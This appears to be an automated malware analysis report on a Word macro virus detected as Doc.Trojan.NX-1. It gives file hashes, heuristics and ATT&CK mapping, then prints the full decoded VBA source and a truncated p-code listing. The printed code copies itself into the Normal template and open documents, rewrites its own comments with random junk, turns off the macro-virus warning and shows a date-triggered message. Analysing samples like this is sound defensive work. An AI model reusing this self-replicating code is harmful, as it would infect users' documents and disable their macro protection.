Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 436a0b2ed029b11b…

MALICIOUS

Office (OLE)

32.5 KB Created: 1999-11-18 07:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d6d5cf229b96b0b9fc9f57ea13a71148 SHA-1: 8f2f14bef28e984db90ad394357e5c6ed4122cbf SHA-256: 436a0b2ed029b11b1f8d593dcb34eab3a42c86cb3af17117ce0fdce611d28378
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to copy its own code into the Normal template and the active document, suggesting an intent to achieve persistence or ensure repeated execution. The ClamAV detection 'Doc.Trojan.NX-1' further confirms its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.NX-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NX-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13714 bytes
SHA-256: 01062a27670dfbdc6bccc146326bb8e1d5a7ad23bd0a3a94c0b125316a33a0e7
Detection
ClamAV: Doc.Trojan.NX-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub A187() ''
'³Ριψ«¬ξ«ΞµΗ�Πο�Θφ°ΉΞίκΝ©ϋΚΣίΟέΕΝτθέΙΞΝ«Ί»ϋ
Dim doc1i As Boolean, doc2i As Boolean ''
'τΜαΩ®ΩΤχ±¬§³φ©¦»ΌχΛμ©©ΐ―ώΈ�©ΏκΉ
doc1i = True: doc2i = True ''
ID = "Private Sub A187() ''" ''
'ΪήΦώ¶νφµ
Set doc1 = NormalTemplate.VBProject.VBComponents(1): Set doc2 = ActiveDocument.VBProject.VBComponents(1) ''
Set h = VBE.ActiveVBProject.VBComponents(1) ''
'ΉώΜΠΟµξΉΖρΟ¨ΔΛ§ΈϋςΫή§ΞµΣΒΤξσΉγΦμχ§�ΘΡϊ―ΥθηθΗηύ²Υ¦ΰΒ®θύΫΖΟ¥γΒ
If doc1.CodeModule.Lines(1, 1) <> ID Then doc1i = False ''
If doc2.CodeModule.Lines(1, 1) <> ID Then doc2i = False ''
'�ΖΟςεωΝέ¨λ·Ώ¥λΌηέρ¬ύ�«ΩθΉίΓγΜΨΫΤ禧κΊΥ―Α
scr = h.CodeModule.Lines(1, h.CodeModule.CountOfLines) ''
'γώ¶υ¶¶ΕσΦϋΌΐΫΤ³άΣ«ΝθρΨ―ωΗΛχ²άξ»Ζ¬ξς
If doc1i = False Then ''
doc1.CodeModule.AddFromString scr ''
End If ''
If doc2i = False Then ''
'―εμηψίΰσ�Δ©¥�Ό½³ΓέΔ¶¶ϊΙαΣΖιάΤήκνόώΡ¬Ψέώ΄Β§ΞΙΝ©――«έηπνΛ―Έψ
doc2.CodeModule.AddFromString scr ''
'σΏµΒΧβΔΦΛµΎΉθχνΏΙ°ΓψΥΘΕ°πΣΰύζ¶ΐη΄ΟΖΩΐτΝ΄μΗςύψ�ΰΑΡΒΔ®ΙΩΕΜ¦ήΑψ»ήώΰ
End If ''
For i = 1 To doc1.CodeModule.CountOfLines ''
lin = doc1.CodeModule.Lines(i, 1) ''
'κΦθπΩ®
com = "" ''
For t = 1 To (70 * Rnd) ''
'°ΏΓίΊΠ¥κΉ·ΩΦ²Μάώσμγ¬ΞΏ·ΐΒοφ�ΈΘΈκο®ΏζΉτιβ«όΑΊΡµ�ϊκρ½΄λΦθ
com = com + Chr(255 - (90 * Rnd)) ''
Next t ''
If Right(lin, 2) <> "''" Then ''
'Δ®ϊί³υγςω¥γΡξλωοΘ�νσ¬ΒμΔ®ΧτΟΔπκΓρεθΎ°ΑΘιΉ¶ύ―Σωΰ®ΉΦΗ«θΤΦϊβιΠ¦ή®ΤΖ
doc1.CodeModule.ReplaceLine i, "'" + com ''
End If ''
'Ν¶Γ�Τ§ΔΈΌόοάΉΉΑ°ΫΈκΉΤΜςΜΈ¶υΌξόΧ¦§ήΜΛΚΖ
Next i ''
For y = 1 To doc2.CodeModule.CountOfLines ''
lin = doc2.CodeModule.Lines(y, 1) ''
com = "" ''
For t = 1 To (70 * Rnd) ''
com = com + Chr(255 - (90 * Rnd)) ''
'Ϋψ§τς¬ΧόΉξΣΕ�¬ΈΡηάΰνΫΓΊΨ
Next t ''
'ρόΜΒΑαδ―ϋΥΡΕ³οδΎΣ
If Right(lin, 2) <> "''" Then ''
doc2.CodeModule.ReplaceLine y, "'" + com ''
End If ''
Next y ''
End Sub ''
'ΐ±³ρΩηλ˻©»ύυ±ΥλΊΦΰ§Λύ±­ΡκΧ²®ΒΝΨΔρς­µχλιΰι΄
Private Sub Document_New(): A187: End Sub ''
Private Sub Document_Open(): A187: Options.VirusProtection = (Rnd): Options.SaveNormalPrompt = (Rnd): Application.EnableCancelKey = wdCancelDisabled: End Sub ''
'ΔΒυΈΞ΄ΤΣζά·¶½όχ�μριΑ¬�τΖΗύ³ΌΕφΩ±ϊ²Ρ»χµΛ―«³πΧΛνΤΙχώι�ϊ²»Κ
Private Sub Document_Close(): A187: P187: End Sub ''
Private Sub P187() ''
'κφ¨ξΡθµ�ΣΌηϋσηΛΎ�λ³Έ¦©ΰΩ±ξιθψΎΪΐ
If Day(Now) = 20 Then ''
Application.Caption = "Who am I?Where am I going?-187.PEACE" ''
'τσύΉΐυλώ»«υΘΨΐΕΌϊύβ�ΖΦΈΠ
Application.Height = 187 ''
'ώΛΘΞϊθΤΡΐ¬±ΫυΏΏΥί«έΐλµ�κμΧοµΈ¬ΰ»«®Ϋ°―λυ§π®Όδ΄βΥά�ΐ§λΗΌΩΤΤΓΥυΦΰ·λωµ
Application.Width = 187 ''
Application.Move 187, 187 ''
'­θµι»έΎ¬¶σ―ά΄υφΚ
MsgBox "187.PEACE", vbSystemModal, "Deo to Peace" ''
'λμγδξ²ψνσΰ΄Υ¬ΧέΞ¶ΏφψέΕΞλ¶χζχη³�ΛΗΛΛίΩ
Rem This Virus is dedicated to Peace(eirhnh) ''
'²ΗΊ
Rem Greetings to everyone int the scene ''
Rem Why? The 187 Family! ''
'ΉδέΥΖΤ²ξεβυδΞύ―ΕΑθΫΔζ©κΕτξΦΧΙΪϊρρ±Ξβϋή²πΰπΠκεκ¦πΒΗβ²»ηχΑ
End If ''
'ι
End Sub ''
Private Sub ShowVBCode(): End Sub ''
'ό¥κϊ
'Υλπ�μδεΑ·ζή½ρ

' Processing file: /opt/analyzer/scan_staging/d784c1876f644e6481a3869539c273e2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7819 bytes
' Line #0:
' 	FuncDefn (Private Sub A187())
' 	QuoteRem 0x0013 0x0001 "'"
' Line #1:
' 	QuoteRem 0x0000 0x002A "³Ριψ«¬ξ«ΞµΗ�Πο�Θφ°ΉΞίκΝ©ϋΚΣίΟέΕΝτθέΙΞΝ«Ί»ϋ"
' Line #2:
' 	Dim 
' 	VarDefn doc1i (As Boolean)
' 	VarDefn doc2i (As Boolean)
' 	QuoteRem 0x0027 0x0001 "'"
' Line #3:
' 	QuoteRem 0x0000 0x001F "τΜαΩ®ΩΤχ±¬§³φ©¦»ΌχΛμ©©ΐ―ώΈ�©ΏκΉ"
' Line #4:
' 	LitVarSpecial (True)
' 	St doc1i 
' 	BoS 0x0000 
' 	LitVarSpecial (True)
' 	St doc2i 
' 	QuoteRem 0x001B 0x0001 "'"
' Line #5:
' 	LitStr 0x0015 "Private Sub A187() ''"
' 	St ID 
' 	QuoteRem 0x001D 0x0001 "'"
' Line #6:
' 	QuoteRem 0x0000 0x0008 "ΪήΦώ¶νφµ"
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set doc1 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0
... (truncated)